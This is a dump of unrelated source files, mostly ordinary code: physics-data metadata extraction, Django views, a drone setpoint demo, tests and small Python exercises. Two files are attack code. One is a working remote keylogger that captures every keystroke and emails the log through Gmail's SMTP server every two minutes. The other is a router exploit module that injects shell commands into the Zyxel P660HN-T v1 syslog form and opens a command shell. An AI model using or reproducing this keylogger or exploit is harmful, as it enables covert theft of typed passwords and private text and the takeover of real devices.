commoninfo["runId"] = abs(ROOT.evtHeader.getRunId())
#get all entries
commoninfo["eventNum"] = ROOT.num
#get TotEvtNo
#commoninfo["TotEvtNo"] = list(i for i in ROOT.jobInfo.getTotEvtNo())
#get JobOption
commoninfo["jobOptions"] = list(i for i in ROOT.jobInfo.getJobOptions())
#set DataType
commoninfo["dataType"]='dst'
return commoninfo
#get bossVer,eventNum,dataType,fileSize,name,eventType,expNum,
#resonance,runH,runL,status,streamId,description
class DataAll(object):
def __init__(self,dstfile,rootfile):
self.dstfile = dstfile
self.rootfile = rootfile
def getAttributes(self):
#store all attributes
attributes = {}
expRes = {}
runIds = []
#change the .dst file to .root file
rootfile = changeFormat(self.dstfile,self.rootfile)
if getFileSize(self.dstfile)<5000:
print "Content of this file is null:",self.dstfile
return "error"
else:
attributes = getCommonInfo(rootfile)
#get filesize by calling getFileSize function
#get name by calling getLFN function
attributes["fileSize"] = getFileSize(self.dstfile)
attributes["LFN"] = getLFN(self.dstfile)
#for .dst files of Data/All,their EventType are "all"
attributes["eventType"] = "all"
#get runId from filename
runId = splitLFN(attributes["LFN"],"all")
#compare runid of rootfile with runid in filename
if attributes["runId"] == runId:
runIds.append(attributes["runId"])
#get expNum and Resonance by calling getExpRes(runIds)
expRes = getExpRes(runIds)
if expRes == False:
print "Can't get expNum and resonance of this file"
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["resonance"] = expRes["resonance"]
#set RunH=RunId and RunL=RunId
attributes["runH"] = attributes["runId"]
attributes["runL"] = attributes["runId"]
else:
print "runId of %s,in filename is %d,in rootfile is %d"%(self.dstfile,lfnInfo["runId"],attributes["runId"])
return "error"
#set values of attribute status,streamId,Description
#and these values are null
#-1 <=> value of status is null
#-1 <=> value of streamId is null
#null <=> value of Description is null
attributes["status"] = -1
attributes["streamId"] = 'stream0'
attributes["description"] = 'null'
del attributes["runId"]
del attributes["jobOptions"]
return attributes
#get resonance,runL,runH,eventType,streamId,LFN from file name
#file name like resonance_eventType_streamId_runL_runH_*.dst
#get bossVer,runL,runH,eventNum by reading information from rootfile
class Others(object):
def __init__(self,dstfile,rootfile):
self.dstfile = dstfile
self.rootfile = rootfile
def getAttributes(self):
#store all attributes
attributes = {}
expRes = {}
lfnInfo = {}
runIds = []
#change the .dst file to .root file
rootfile = changeFormat(self.dstfile,self.rootfile)
if getFileSize(self.dstfile)<5000:
print "Content of this file is null:",self.dstfile
return "error"
else:
attributes = getCommonInfo(rootfile)
#get filesize by calling getFileSize function
#get lfn by calling getLFN function
attributes["fileSize"] = getFileSize(self.dstfile)
attributes["LFN"] = getLFN(self.dstfile)
#get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function
lfnInfo = splitLFN(attributes["LFN"],"others")
#if runL is equal to runH,this file only has one runId
if lfnInfo["runL"] == lfnInfo["runH"]:
#if runId in filename also is equal to runId in rootfile
if attributes["runId"] == lfnInfo["runL"]:
runIds.append(attributes["runId"])
attributes["runL"] = attributes["runId"]
attributes["runH"] = attributes["runId"]
#get expNum and Resonance by calling getExpRes()
expRes = getExpRes(runIds)
if expRes == False:
print "Can't get expNum and resonance of this file"
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["description"] = "null"
#if resonance in filename is same as resonance that get from ExpSearch
if expRes["resonance"] == lfnInfo["resonance"]:
attributes["resonance"] = expRes["resonance"]
else:
print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"])
return "error"
else:
print "Error %s:in the filename,runL = runH = %d,but runId in the root file is %d"%(self.dstfile,lfnInfo["runL"],attributes["runId"])
return "error"
else:
#this dst file has several runIds,get them from JobOptions by calling getRunIdList function
result = getRunIdList(attributes["jobOptions"])
if result is not None:
runH = max(result["runIdList"])
runL = min(result["runIdList"])
if runL == lfnInfo["runL"]:
if runH == lfnInfo["runH"]:
attributes["runL"] = lfnInfo["runL"]
attributes["runH"] = lfnInfo["runH"]
#get expNum and Resonance by calling getExpRes(runid)
expRes = getExpRes(result["runIdList"])
if expRes == False:
print "Error:",this.dstfile
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["description"] = result["description"]
if expRes["resonance"] == lfnInfo["resonance"]:
attributes["resonance"] = lfnInfo["resonance"]
else:
print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"])
return "error"
else:
print "Error %s:runH in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runH"],runH)
return "error"
else:
print "Error %s:runL in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runL"],runL)
return "error"
#get streamId from filename
attributes["streamId"] = lfnInfo["streamId"]
#check eventType in filename
evtType_exists = eventTypeCheck(lfnInfo["eventType"])
if evtType_exists == True:
attributes["eventType"] = lfnInfo["eventType"]
else:
print "Error %s:eventType %s in filename is not stored in AMGA"%(self.dstfile,lfnInfo["eventType"])
return "error"
#set values of attribute status
#-1 <=> value of status is null
attributes["status"] = -1
del attributes["runId"]
del attributes["jobOptions"]
return attributes
if __name__=="__main__":
import time
start=time.time()
obj = DataAll("/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root")
end = time.time()
print "661:",str(start - end)
start = time.time()
obj = DataAll("/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root")
end = time.time()
print "655:",str(start - end)
| 2.125 | 2 |
rivet/views.py | DruidGreeneyes/rivet_site | 0 | 12796641 | <reponame>DruidGreeneyes/rivet_site<gh_stars>0
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from .models import Comparison
from pyrivet_core.sqlite3_lexicon import Lexicon
from pyrivet_core import rivet
# Create your views here.
def get_latest_comparisons(num=5):
return Comparison.objects.order_by('id')[:num]
def index(request):
latest_comparisons = get_latest_comparisons()
context = {
'latest_comparisons': latest_comparisons,
}
output = render(request, 'rivet/index.html', context)
return output
def submit(request):
try:
document_a, document_b = sorted((request.POST['doca'], request.POST['docb']))
do_deep = 'deep' in request.POST
except KeyError:
latest_comparisons = get_latest_comparisons()
return render(request, 'rivet/index.html', {
'latest_comparisons': latest_comparisons,
'error_message': "Bad Input!"
})
else:
try:
cmp = Comparison.objects.get(document_a=document_a, document_b=document_b)
except Comparison.DoesNotExist:
print("Comparing documents: ")
if do_deep:
with Lexicon.open(size=1000, nnz=8) as lex:
result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True)
else:
result = rivet.compare_documents(document_a, document_b)
result = result[0][1]
cmp = Comparison(document_a=document_a, document_b=document_b, result=result)
cmp.save()
return HttpResponseRedirect(reverse('comparison', args=(cmp.id,)))
def comparison(request, comparison_id):
c = get_object_or_404(Comparison, pk=comparison_id)
r = c.result
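    # Rescale the stored similarity for display: the constants 0.55 and 2.2 presumably
    # map the useful similarity range (roughly 0.55-1.0) onto a 0-100 percentage.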
r -= 0.55
r *= 2.2
r = int(r * 100)
return render(request, 'rivet/comparison.html', {'comparison': c, 'result': r})
| 2.171875 | 2 |
openuav-app/dockerfiles/openuav_sample/ros-setups/intel-edison/setpoint_demo.py | harishanand95/openuav-playground | 23 | 12796642 | #!/usr/bin/env python
# vim:set ts=4 sw=4 et:
#
#
# ****************************************************************************
# *
# * Copyright (c) 2015 UAVenture AG. All rights reserved.
# * Author: <NAME> <<EMAIL>>
# *
# * Redistribution and use in source and binary forms, with or without
# * modification, are permitted provided that the following conditions
# * are met:
# *
# * 1. Redistributions of source code must retain the above copyright
# * notice, this list of conditions and the following disclaimer.
# * 2. Redistributions in binary form must reproduce the above copyright
# * notice, this list of conditions and the following disclaimer in
# * the documentation and/or other materials provided with the
# * distribution.
# * 3. Neither the name PX4 nor the names of its contributors may be
# * used to endorse or promote products derived from this software
# * without specific prior written permission.
# *
# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# * POSSIBILITY OF SUCH DAMAGE.
# *
# ****************************************************************************
import rospy
import thread
import threading
import time
from geometry_msgs.msg import PoseStamped, Quaternion
from math import *
from mavros.srv import CommandBool
from mavros.utils import *
from std_msgs.msg import Header
from std_msgs.msg import String
from tf.transformations import quaternion_from_euler
class Setpoint:
def __init__(self, pub, rospy):
self.pub = pub
self.rospy = rospy
self.x = 0.0
self.y = 0.0
self.z = 0.0
try:
thread.start_new_thread( self.navigate, () )
except:
print "Error: Unable to start thread"
# TODO(simon): Clean this up.
self.done = False
self.done_evt = threading.Event()
sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached)
def navigate(self):
rate = self.rospy.Rate(10) # 10hz
msg = PoseStamped()
msg.header = Header()
msg.header.frame_id = "base_footprint"
msg.header.stamp = rospy.Time.now()
while 1:
msg.pose.position.x = self.x
msg.pose.position.y = self.y
msg.pose.position.z = self.z
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 0 # North
yaw = radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
msg.pose.orientation = Quaternion(*quaternion)
self.pub.publish(msg)
rate.sleep()
def set(self, x, y, z, delay=0, wait=True):
self.done = False
self.x = x
self.y = y
self.z = z
if wait:
rate = rospy.Rate(5)
while not self.done:
rate.sleep()
time.sleep(delay)
def reached(self, topic):
#print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z)
if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5:
self.done = True
self.done_evt.set()
def setpoint_demo():
pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10)
rospy.init_node('pose', anonymous=True)
rate = rospy.Rate(10)
setpoint = Setpoint(pub, rospy)
print "Climb"
setpoint.set(0.0, 0.0, 3.0, 0)
setpoint.set(0.0, 0.0, 10.0, 5)
print "Sink"
setpoint.set(0.0, 0.0, 8.0, 5)
print "Fly to the right"
setpoint.set(10.0, 4.0, 8.0, 5)
print "Fly to the left"
setpoint.set(0.0, 0.0, 8.0, 5)
offset_x = 0.0
offset_y = 0.0
offset_z = 10.0
sides = 360
radius = 20
print "Fly in a circle"
setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first
i = 0
while not rospy.is_shutdown():
x = radius * cos(i*2*pi/sides) + offset_x
y = radius * sin(i*2*pi/sides) + offset_y
z = offset_z
wait = False
delay = 0
if (i == 0 or i == sides):
# Let it reach the setpoint.
wait = True
delay = 5
setpoint.set(x, y, z, delay, wait)
i = i + 1
rate.sleep()
if (i > sides):
print "Fly home"
setpoint.set(0.0, 0.0, 10.0, 5)
break
# Simulate a slow landing.
setpoint.set(0.0, 0.0, 8.0, 5)
setpoint.set(0.0, 0.0, 3.0, 5)
setpoint.set(0.0, 0.0, 2.0, 2)
setpoint.set(0.0, 0.0, 1.0, 2)
setpoint.set(0.0, 0.0, 0.0, 2)
setpoint.set(0.0, 0.0, -0.2, 2)
print "Bye!"
if __name__ == '__main__':
try:
setpoint_demo()
except rospy.ROSInterruptException:
pass
| 1.632813 | 2 |
tests/models/test_models.py | kynk94/torch-firewood | 1 | 12796643 | import importlib
import sys
import pytest
from firewood import models
gan = ["gan." + model for model in models.gan.__all__]
semantic_segmentation = [
"semantic_segmentation." + model
for model in models.semantic_segmentation.__all__
]
all_models = gan + semantic_segmentation
@pytest.mark.parametrize("model", all_models)
def test_models(model: str) -> None:
module = importlib.import_module("firewood.models." + model)
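    # Reset argv, presumably so each model's main() does not parse pytest's own arguments.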
sys.argv = [""]
module.main()
| 2.0625 | 2 |
keylogger_remoto.py | HerikCarvalho/keylogger_remoto_py | 0 | 12796644 | # keylogger_remoto_py
#Um Keylogger Remoto em Python
import keyboard # para keylogs
import smtplib # para enviar email usando o protocolo SMTP (gmail)
# O semáforo é para bloquear o segmento atual
# O temporizador é para executar um método após uma quantidade de tempo "intervalo"
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 120 # 02 minutes
EMAIL_ADDRESS = "<seu_endereço_de_email>"
EMAIL_PASSWORD = "<<PASSWORD>>"
class Keylogger:
def __init__(self, interval):
# passaremos SEND_REPORT_EVERY para o intervalo
self.interval = interval
# esta é a variável de string que contém o log de todos
# as teclas dentro de "self.interval"
self.log = ""
# para bloquear após definir o ouvinte on_release
self.semaphore = Semaphore(0)
def callback(self, event):
"""
Esse retorno de chamada é chamado sempre que um evento de teclado ocorre
(ou seja, quando uma chave é liberada neste exemplo)
"""
name = event.name
if len(name) > 1:
# não é um caractere, tecla especial (por exemplo, ctrl, alt etc.)
# maiúsculas com []
if name == "space":
# " "em vez de "espaço"
name = " "
elif name == "enter":
# adicione uma nova linha sempre que um ENTER for pressionado
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# substituir espaços por sublinhados
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# gerencia uma conexão com um servidor SMTP
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# conectar-se ao servidor SMTP como modo TLS (por segurança)
server.starttls()
# faça login na conta de email
server.login(email, password)
# envie a mensagem real
server.sendmail(email, email, message)
# finaliza a sessão
server.quit()
def report(self):
"""
Esta função é chamada todo "self.interval"
Ele basicamente envia keylogs e redefine a variável "self.log"
"""
if self.log:
# se houver algo no log, relate-o
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# pode imprimir em um arquivo, o que você quiser
# imprimir(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# inicie o keylogger
keyboard.on_release(callback=self.callback)
# comece a relatar os keylogs
self.report()
# bloquear o segmento atual
# desde on_release () não bloqueia o segmento atual
# se não o bloquearmos, quando executarmos o programa, nada acontecerá
# isso ocorre porque on_release () iniciará o ouvinte em um thread separado
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
#by Herik_Carvalho
| 3.375 | 3 |
Hash/keyword-rows.py | nishantml/Data-Structure-And-Algorithms | 0 | 12796645 | <filename>Hash/keyword-rows.py
"""
Given a list of words, return the words that can be typed using letters from only one row
of the American keyboard (the keyboard image from the original problem statement is omitted here).
Example:
Input: ["Hello", "Alaska", "Dad", "Peace"]
Output: ["Alaska", "Dad"]
Note:
You may use one character in the keyboard more than once.
You may assume the input string will only contain letters of alphabet.
"""
from typing import List
class Solution:
def findWords(self, words: List[str]) -> List[str]:
row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'];
row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l']
row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm']
inteligentWords = []
for word in words:
Hash = {'first': 0, 'second': 0, 'third': 0}
for letter in list(word.lower()):
if letter in row1:
Hash['first'] = Hash['first'] + 1
if letter in row2:
Hash['second'] = Hash['second'] + 1
if letter in row3:
Hash['third'] = Hash['third'] + 1
if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word):
inteligentWords.append(word)
return inteligentWords
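# Illustrative usage (example taken from the problem statement above):
#   Solution().findWords(["Hello", "Alaska", "Dad", "Peace"])  ->  ["Alaska", "Dad"]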
| 4.375 | 4 |
strings/split_join.py | janbodnar/Python-Course | 13 | 12796646 | <reponame>janbodnar/Python-Course
#!/usr/bin/python
# split_join.py
nums = "1,5,6,8,2,3,1,9"
n = nums.split(",")
print (n)
m = ':'.join(n)
print (m)
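# Expected output:
#   ['1', '5', '6', '8', '2', '3', '1', '9']
#   1:5:6:8:2:3:1:9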
| 3.8125 | 4 |
src/pangadfs_gui/resources.py | sansbacon/pangadfsGUI | 0 | 12796647 | <gh_stars>0
# Resource object code (Python 3)
# Created by: object code
# Created by: The Resource Compiler for Qt version 6.2.2
# WARNING! All changes made in this file will be lost!
from PySide6 import QtCore
qt_resource_data = b"\
\x00\x00\x03m\
\x89\
PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\
\x00\x00\x00\x19tEXtSoftware\
\x00Adobe ImageRead\
yq\xc9e<\x00\x00\x03\x0fIDATx\xda\x8c\
S[k\x13A\x14>;{K\xd3&\xbd\xc4Vk\
\xbc\xa4\x17\xac\xb4\xd6V#R+j\xa5*\x0aZh\
\xc1\xe2\x83\x0f>\xf5A,\x14\xfa'\x04\x1f\x14\x04\xa1\
\x05\x8b`|T\xa1*\xa8\xf5\x8a (j\xbd\xd2\x0b\
\x8dI\x89\xb76ib\x93\xddl2\xbb;\xeb\x99\x90\
*\xfa\xe4\xc0\xb7s8\xfb\x9d33\xdf9G\xe8\x1a\
[\x00\x10\x04XY\x0ec`\xdb6\x18\x9a\x06\x92,\
\x03\x11\xc5\x82_QU\xa4\x09#h>\xb3,+d\
\x99&X\x94\x82\x04\xff\xb9L\x0c \x84\x04\xd1\x0c\x16\
]!\xfe\xe1\x09\xce\x80\xe3\xd4\xe1\x9eFD\x10\xcf\x11\
sER\xd0q\x9c>\xdc\xb7:\xb6]\xc3\xf0f\xbd\
]\xeb\x827\x9f|\x19\xc2\x98B\x12\x09\xaf\xd3p\xfc\
@m}Z\xb7\xcd\xef\x89\x5c\xfd\xcc\xbc\xb6\x03y\x0f\
\x91\x10\x10\x05v\xaa\xb9\xde[\xb3\xda\xe7.w)\xa2\
K\x00AL$(\x1c\xe9X\x13\x1c\x7f:?\x84\x09\
\x12\x12\x7f\x0b*@\x1c\x13T\x9f[Q\xf7\xb4Vz\
\x1f\xbc\xf82\xecq\x8b\x81\xbd;\xfckL\x0a\xb2M\
\x1d0\xc1A\x0d\x1c\xa0\xd4\x82|^\x023\x9f/\x5c\
QB!\xc27&\xa2R\xc0_VV[U\xea\x8b\
\xccgVY9\xa3\xb5sg\xa0L\xd7lQ\x94\x80\
}\x8e%\xbeEb?\x93z\x96\x9a=\xdd\xcd\xc1\x1b\
\xf7>\xbeFA/\x88\xb2|Wh;\xfb\x81\xeb\xb0\
\x11\xdfzhU\xa5k\xbb\xb6\x9c9\xd6\xd2T[\xa9\
*\xaab3\xcby\xfb)6\xbb\x94\xcc>\x12\x08\x19\
\xc1\x0a]\xe6\xa7\xf2`YUC\x92\xa2\x80\x94I&\
-\xf4\x85\xd1;\x9aNX\xe3~\x7fEI\x9c\x09J\
&\xa5A6\xb6\x90\x89\xc7\xb50\x91\xa4A\x0c\xb6\x91\
w\x0e\xd1\x80\x87\x85h.\x07\x1c$\x9dL*\x88\xed\
Z*uQ)\x11\x1b\xf4\xba:\xcf$UA7(\
]H\xe9Y\xaf\xcf\xfb\x15\x83\x060\x9eW\xaa\x03Q\
\x8d\x09\xf6S\xc3\x00}y\x19DyK\xdf%\xaf\xa7\
d\xb0\xbaiC[\xba\xbd=\x10a.REL;\
\xf1\xf2\x83nl\xda<-\x06\xd6I.\xc1\xae\xa2Z\
6h\x199\xb6\xaf\x7fwcx2\xcc\x93P\xc6X\
T(=q\xf5\xd5\x91\xd3\xfd\xc1\xdbi\x05L,m\
\xb5m\x98t\xe2\xd1\x0f\x82?\xd5\xc3\x07\x96\x16\x05\x97\
D\xb0L\x1e\x19\xc0\x8bjEu\x80m\x15\x00\xb1k\
\xb7\xe6\x0a}`b;N\xe7\xf1\x08=\x99g\x91\xe8\
\xcf\xe5wS\x8b\x8c\xd2+n\x8f'\x9a\xbds\xbf\xdb\
\xd7\xd4Xn\xae\xf5\xbb-O\x99\x92#\x12a\x98\xcc\
`\x00\xb4XFA\xec\x19\x19\xc1\xeb\xb4\xa3\x1dG\xbc\
G\x85\xaf\x93T\xf8\xb5\xea.\x01\xf0mjD\xf1v\
\xa1\x9f\xbf\xbf\x1cA\xd6\x0f\x9cl\x8c\x8d\x86\xe6\x907\
\x8e\xe2>\x16\x84\xa6\xa38A\x7fz\xde\x99\xbd\xfd\xd7\
\x0c\xc8-\xbd\xbfm\xe4\x9e/p\x123\xe3l\xfa\xd6\
c{q\x8a7a\x012\x1f8\x84\xab\x08\xb5\xb8s\
\xbf\xb8\x92\x80t\x0e\x1f\x84\x5cj\x96\xbd\x19\xe3\xf3\x92\
A\x18+\x09H\x91(\xfd\x03R\xc4\xcab|0\x11\
\x5c\x00\xca\xed_\x02\x0c\x00\xa6=o\xdb2\xe1%J\
\x00\x00\x00\x00IEND\xaeB`\x82\
\x00\x00\x02\xdb\
\x89\
PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\
\x00\x00\x00\x19tEXtSoftware\
\x00Adobe ImageRead\
yq\xc9e<\x00\x00\x02}IDATx\xda\x8c\
\x93\xdfK\x93Q\x18\xc7\xbf\xef\xd9\xd9t3s\xad\x9c\
LG\xcd\xb5i\x18\x85\x91\xd4\x8d\x10\x98AR\x17A\
^ue\x17\x15A\x7fB\x16DPDw]G\xd7\
F\x91A\xdeu\x11\x95\x11\x1a\x94\x09\x22-\x86\xe9\x9c\
,$+u\x93\xf7=?z\xce\xd9\xa6.\x08:p\
8\xcf\xf9\xf1|\xdf\xcf\xf7<\xefq&\xef\xc06\xc7\
\xc1E\x1a\x12\xf8\xbf6\xa75\x1e\xdd\xdb\xb8\x09\xae+\
+\xb4\x90\xec\x1a\xbc{}=?\x0bGi\x84\xf6\xb4\
#\x18\x8e\x83\xf9\x02\xb5\xa9\x9cc\xf2\xe1\x85\xdb#\xee\
Py\xaa\xd4\xe6\x16k\x88\xa6)q?\xdc\xd5\x02\xd6\
\xf3_0\xfe\xf6\x0d\x9c\xc4\x99\x9a|\xc7\xef\xc7\x07\xef\
\xf4\xd1y\xb5\xef2M\x97\xb8\xd4[\x02J\x0ah\xcf\
\x03\xaf\x0b#\xdc\xd9\x8bX\xc1A{\xef%\x84B!\
0\xc66\x0f\xf6\x9f\xbc6@\xc3\xc0\xf9\xe1\xe1\xab\x5c\
n\x11\xf8\xb4\x940\xdd6!\xf0b\xa9\x84\xb1\xd7?\
\xa1\xd4\x0f\xf0]QH\xc2\x95\xb4\xafh|\xdf\xd7\x04\
%\xa5\xc3\xab\xe7\xab\x02\x86\xc2\xe2\xd0\x17\xd5\xc6:N\
\xb43J\xd2x\xf7\x0b\xe8K\x18\x01\x85\x97YX\x11\
!\x84\xc3\xc56\x02%=H\xe1U\x0c9h\xd0.\
\xd6\x96V\xa0\xe9p\x7f\x84C\x16\x94%\xec\x0f\x92\x90\
\xdea\x04\xd8v\x0b\x5c\x09\x22\x10e\x02\x87\xf9\x10T\
.\xae\xa4\x1a\xed|qm\x05=\x1d\x1d6\x1e\x9f\x9e\
&\x818\x84\xe71.j,\x88-\x0b\xd2G\xb8\x02\
3\xb9\x9c\xf1\x8a\xb6\xb66L\xcc\xce\xda;\xb0Wd\
,X\x81\x1a\x02\x0f\xaabA\x99;\xa0\xc3\xe9\xd6V\
;\xff^,\xe2H:m\xe3\x89\x99\x19\x22\xd0e\x81\
\xcf\xdf\x80\xaex\xe5\x0e\x08_\x8a\xea%\xfa\xac\x9dL\
>o\x85b\xb1\x18>f2\x9b\x04\xa6\x22\x1e\x09\xb0\
\x1b#\x80\x11\xf1\x04\x02\xcaZ\xf0*\xdd\xc4\x0a\xc9\x96\
\x16\xa4\x88b\xc3uq(\x99Dw\x85\xc2\x10X\x01\
\x8a\x83\xb7\x9e \xf2\xbb\x84\x9d\x9a\x12\x94-e\xf9\x7f\
0%\xcb\x16\x0a\xf8J\x14\xa6Mg\xb3\xf8D\x14U\
\x01\xb7T\xaa\xe3\x14\xd7S\x8fL\xcd!\x9fz\xf5t\
5q\xa0\xa7\xbeiw\xccoJ\xd7\xecW\x8867\
\xdb\x84\x16\xb2P\xf3$\xe8\x97^Y^np\xaa\x0b\
\xa7\x0e\x03\x83\xc7q\x8e\xde\xd1@$\x1a\xefL\x1d<\
\x96x\xfcl\x8c=\x98\xda\xfb\x9c\x05\x02%\x871\xf9\
\xf7\x93T\xc5\xe2\x02\xafY\xd0\x18\xa5\xaa\x8c.\xe6r\
\xdd\x0b\xf3\xb9\xb3\x8d\x1c\xb1b&s\x9f\xb6\xbc\x7f<\
\xeb\xd2\x1f\x01\x06\x00\xd2\x97^|\x9f\xc2\xaf\xc8\x00\x00\
\x00\x00IEND\xaeB`\x82\
"
qt_resource_name = b"\
\x00\x05\
\x00o\xa6S\
\x00i\
\x00c\x00o\x00n\x00s\
\x00\x0b\
\x0d\xd7\xa0\xc7\
\x00s\
\x00h\x00u\x00f\x00f\x00l\x00e\x00.\x00p\x00n\x00g\
\x00\x0c\
\x07\x90\xdd\xa7\
\x00o\
\x00p\x00e\x00n\x00p\x00r\x00o\x00j\x00.\x00p\x00n\x00g\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00,\x00\x00\x00\x00\x00\x01\x00\x00\x03q\
\x00\x00\x01}\xe0D>B\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01}\xe0D>B\
"
def qInitResources():
QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 1.28125 | 1 |
apis_configs/config_helper.py | yewu/icdc-demo | 2 | 12796648 | import json
import os
# make it easy to change this for testing
XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')
def default_search_folders(app_name):
'''
Return the list of folders to search for configuration files
'''
return [
'%s/cdis/%s' % (XDG_DATA_HOME, app_name),
'/usr/share/cdis/%s' % app_name,
'/var/www/%s' % app_name
]
def find_paths(file_name,app_name,search_folders=None):
'''
Search the given folders for file_name
search_folders defaults to default_search_folders if not specified
    return the list of paths to file_name that exist (may be empty)
'''
search_folders = search_folders or default_search_folders(app_name)
possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]
return [ path for path in possible_files if os.path.exists(path) ]
def load_json(file_name,app_name,search_folders=None):
'''
json.load(file_name) after finding file_name in search_folders
return the loaded json data or None if file not found
'''
actual_files = find_paths(file_name, app_name, search_folders)
if not actual_files:
return None
with open(actual_files[0], 'r') as reader:
return json.load(reader)
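# Illustrative usage ('myapp' and 'config.json' are example names, not real files):
#   load_json('config.json', 'myapp') looks for config.json under
#   $XDG_DATA_HOME/cdis/myapp, /usr/share/cdis/myapp and /var/www/myapp, in that order,
#   and returns the parsed JSON, or None if the file is not found.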
| 2.703125 | 3 |
maza/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py | ArturSpirin/maza | 2 | 12796649 | from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "Zyxel P660HN-T v1 RCE",
"description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. "
"If the target is vulnerable it allows to execute commands on operating system level.",
"authors": (
"<NAME> <pedrib[at]gmail.com>", # vulnerability discovery
"<NAME> <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://seclists.org/fulldisclosure/2017/Jan/40",
"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"https://blogs.securiteam.com/index.php/archives/2910",
),
"devices": (
"Zyxel P660HN-T v1",
),
}
target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
port = OptPort(80, "Target port")
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mipsbe")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
payload = ";{};#".format(cmd)
data = {
"remote_submit_Flag": "1",
"remote_syslog_Flag": "1",
"RemoteSyslogSupported": "1",
"LogFlag": "0",
"remote_host": payload,
"remoteSubmit": "Save"
}
self.http_request(
method="POST",
path="/cgi-bin/ViewLog.asp",
data=data
)
return ""
@mute
def check(self):
response = self.http_request(
method="GET",
path="/cgi-bin/authorize.asp",
)
if response is None:
return False
if "ZyXEL P-660HN-T1A" in response.text:
return True
return False
| 2.328125 | 2 |
Code/webscrape.py | tcampbell3/Black-Lives-Matter-Lethal-Force | 1 | 12796650 | #Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s
#How to open python in command prompt:
#1) Shift+Right Click -> open command prompt
#2) type "conda activate"
#3) type "python"
